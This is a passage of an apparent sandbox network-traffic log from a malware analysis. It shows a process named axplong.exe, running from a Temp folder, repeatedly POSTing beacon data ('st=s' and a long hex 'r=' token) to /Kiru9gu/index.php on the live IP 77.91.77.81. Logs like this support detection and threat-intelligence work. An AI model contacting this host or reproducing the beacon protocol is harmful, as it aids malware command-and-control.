r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:25:36.858711958 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49764	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:25:36.982732058 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:25:37.669797897 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 2, 2024 00:25:37.671611071 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:25:37.924441099 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49765	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:25:38.043467999 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:25:38.776386023 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 2, 2024 00:25:38.777265072 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:25:39.019613028 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49766	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:25:39.137010098 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:25:39.842719078 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 2, 2024 00:25:39.851182938 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:25:40.075289011 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49767	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:25:40.371304989 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:25:41.010776997 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 2, 2024 00:25:41.015847921 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:25:41.232532978 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49768	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:25:41.347975969 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:25:42.034478903 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 2, 2024 00:25:42.035789013 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:25:42.251048088 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49769	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:25:42.371419907 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:25:43.066766977 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 2, 2024 00:25:43.067783117 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:25:43.286154985 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49770	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:25:43.407735109 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:25:44.145384073 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 2, 2024 00:25:44.182696104 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:25:44.406802893 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49771	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:25:44.530352116 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:25:45.229437113 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 2, 2024 00:25:45.230345011 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:25:45.453689098 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49772	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:25:45.576471090 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:25:46.273478031 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 2, 2024 00:25:46.274374008 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:25:46.498425007 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49773	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:25:46.608462095 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:25:47.324934006 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 2, 2024 00:25:47.326010942 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:25:47.549350977 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49774	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:25:47.670804024 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:25:48.368803978 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 2, 2024 00:25:48.369740963 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:25:48.590985060 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49775	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:25:48.882122993 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:25:49.571902990 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 2, 2024 00:25:49.574723959 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:25:49.793989897 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49776	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:25:49.903357983 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:25:50.592240095 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
